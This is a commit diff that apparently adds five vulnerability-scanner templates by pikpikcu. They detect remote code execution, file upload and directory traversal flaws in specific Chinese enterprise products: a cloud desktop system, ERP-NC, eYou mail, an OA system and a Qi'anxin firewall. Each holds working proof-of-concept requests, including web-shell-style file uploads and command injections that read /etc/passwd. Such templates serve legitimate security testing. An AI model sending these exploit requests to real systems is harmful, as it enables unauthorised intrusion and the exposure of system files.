commit
93bb29bf9e
|
@ -0,0 +1,42 @@
|
|||
id: core-chuangtian-cloud-rce
|
||||
|
||||
info:
|
||||
name: Core Chuangtian Cloud Desktop System RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
||||
tags: rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /Upload/upload_file.php?l=test HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
|
||||
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
|
||||
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
|
||||
Connection: close
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
|
||||
Content-Length: 183
|
||||
|
||||
------WebKitFormBoundaryfcKRltGv
|
||||
Content-Disposition: form-data; name="file"; filename="test.php"
|
||||
Content-Type: image/avif
|
||||
|
||||
<?php phpinfo(); ?>
|
||||
------WebKitFormBoundaryfcKRltGv--
|
||||
|
||||
- |
|
||||
GET /Upload/test/test.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_2, "PHP Version")'
|
||||
- 'status_code_2 == 200'
|
||||
condition: and
|
|
@ -0,0 +1,27 @@
|
|||
id: erp-nc-directory-traversal
|
||||
|
||||
info:
|
||||
name: ERP-NC directory traversal
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
||||
tags: lfi,erp-nc
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Client"
|
||||
- "ncwslogin.jsp"
|
||||
- "admin.jsp"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: eyou-email-rce
|
||||
|
||||
info:
|
||||
name: eYou E-Mail system RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
||||
tags: rce,eyou
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36
|
||||
Content-Length: 25
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
type='|cat /etc/passwd||'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,41 @@
|
|||
id: oa-v9-uploads-file
|
||||
|
||||
info:
|
||||
name: OA V9 Uploads File
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
||||
tags: rce,jsp
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
|
||||
Content-Length: 216
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
|
||||
Connection: close
|
||||
|
||||
------WebKitFormBoundaryFy3iNVBftjP6IOwo
|
||||
Content-Disposition: form-data; name="file"; filename="poc.jsp"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>
|
||||
------WebKitFormBoundaryFy3iNVBftjP6IOwo--
|
||||
|
||||
- |
|
||||
GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_2, "2be8e556fee1a876f10fa086979b8c7c")'
|
||||
- 'status_code_2 == 200'
|
||||
condition: and
|
|
@ -0,0 +1,33 @@
|
|||
id: qi-anxin-netkang-next-generation-firewall-rce
|
||||
|
||||
info:
|
||||
name: Qi'anxin Netkang Next Generation Firewall RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
||||
tags: rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /directdata/direct/router HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
|
||||
Content-Length: 178
|
||||
|
||||
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
|
||||
- |
|
||||
GET /poc.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue